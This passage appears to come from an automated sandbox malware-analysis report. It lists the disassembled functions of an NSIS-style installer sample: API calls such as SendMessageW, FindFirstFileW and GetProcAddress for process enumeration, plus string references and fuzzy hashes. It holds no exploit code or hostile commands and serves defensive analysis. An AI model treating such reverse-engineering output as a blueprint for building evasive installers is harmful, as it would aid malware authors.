                                                                                                                                    • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                                                                                    • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                                                    • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                                                                                    Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                    • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                    • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                                                                                    • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                    • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                                                                    • DeleteObject.GDI32(?), ref: 00404A79
                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                    • String ID: $ @$M$N
                                                                                                                                    • API String ID: 1638840714-3479655940
                                                                                                                                    • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                                                                    • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                                                                                    • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                                                                    • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                                                                                    Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                                                                    • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                                                                    • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                                                                    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                                                                    • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                                                                                    • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                                                                      • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                      • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                      • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                    • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                    • String ID: 82D$@%F$@rD$A
                                                                                                                                    • API String ID: 3347642858-1086125096
                                                                                                                                    • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                                                                                    • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                                                                                    • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                                                                                    • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                                                                                    Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                    • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                                                                    • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                                                                    • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                    • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                    • API String ID: 1916479912-1189179171
                                                                                                                                    • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                    • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                                                                                    • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                    • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                                                                                    Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                                                                    • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                                                                                    • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                                                                    • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                                                                    • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                                                                    • FindClose.KERNEL32(?), ref: 00406E33
                                                                                                                                    Strings
                                                                                                                                    • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                                                                    • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                                                                    • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                                                                    • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                                                                    • \*.*, xrefs: 00406D03
                                                                                                                                    • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                                                                    • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                                                                    • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                    • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                                                                    • API String ID: 2035342205-3294556389
                                                                                                                                    • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                    • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                                                                                    • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                    • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                                                                                    Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                                                                                    • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                                                                    • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                    • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                    • API String ID: 3581403547-784952888
                                                                                                                                    • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                                                                    • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                                                                                    • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                                                                    • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                                                                                    Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                                                                    Strings
                                                                                                                                    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateInstance
                                                                                                                                    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                    • API String ID: 542301482-1377821865
                                                                                                                                    • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                                                    • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                                                                                    • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                                                    • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                                                                                    Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                    • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                                                    • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                                                                                    • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                                                    • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                                                                                    Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                                                                      • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                                                                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                    • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                    • API String ID: 20674999-2124804629
                                                                                                                                    • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                                                    • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                                                                                    • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                                                    • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                                                                                    Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                                                                                    • GetSysColor.USER32(?), ref: 004041AF
                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                                                                                      • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                                                                                      • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                                                                                      • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                                                                                    • SendMessageW.USER32(00000000), ref: 00404251
                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
